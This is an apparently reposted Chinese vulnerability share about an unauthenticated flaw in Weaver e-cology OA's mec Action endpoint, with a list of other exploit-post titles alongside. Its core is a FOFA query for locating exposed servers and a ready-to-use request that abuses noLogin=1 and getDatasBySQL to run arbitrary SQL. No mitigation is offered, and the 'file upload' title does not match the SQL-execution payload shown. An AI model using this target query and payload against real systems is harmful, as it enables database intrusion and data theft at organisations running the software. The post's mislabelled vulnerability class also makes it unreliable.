泛微 e-cology OA mec Action 文件上传漏洞

2024年7月31日20:57:32评论55 views字数 527阅读1分45秒阅读模式

fofa查询语句：

header="testBanCookie" || banner="testBanCookie" || body="/wui/common/css/w7OVFont.css" || (body="typeof poppedWindow" && body="client/jquery.client_wev8.js") || body="/theme/ecology8/jquery/js/zDialog_wev8.js" || body="ecology8/lang/weaver_lang_7_wev8.js"

‍

【漏洞分享】泛微 e-cology OA mec Action 文件上传漏洞

手工复现，直接访问路径即可‍‍‍‍‍‍‍‍‍‍

/mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAdminAction&action=getDatasBySQL&datasource=&sql=select sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456'))&noLogin=1

【漏洞分享】泛微 e-cology OA mec Action 文件上传漏洞

原文始发于微信公众号（Undoubted Security）：【漏洞分享】泛微 e-cology OA mec Action 文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【高危漏洞预警】Craft CMS generate-transform反序列化代码执行漏洞（CVE-2025-32432）

Grafana权限管理不当漏洞

【二次更新已复现】SAP NetWeaver MetadataUploader 文件上传漏洞（CVE-2025-31324）

CVE-2025-26244 DeimosC2 XSS

【PoC】0-Click NTLM 身份验证绕过 Microsoft Telnet 服务器 0day，无补丁

万户 ezOFFICE selectCommentField.jsp sql注入漏洞

NetMizer日志管理系统远程代码执行漏洞

SAP NetWeaver Visual Composer远程代码执行漏洞CVE-2025-31324

【高危漏洞预警】基于browser-use的AI Agent应用pickle反序列化漏洞

昂捷CRM SQL注入漏洞

本文由 admin 发表于 2024年7月31日20:57:32
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
泛微 e-cology OA mec Action 文件上传漏洞https://cn-sec.com/archives/3019368.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.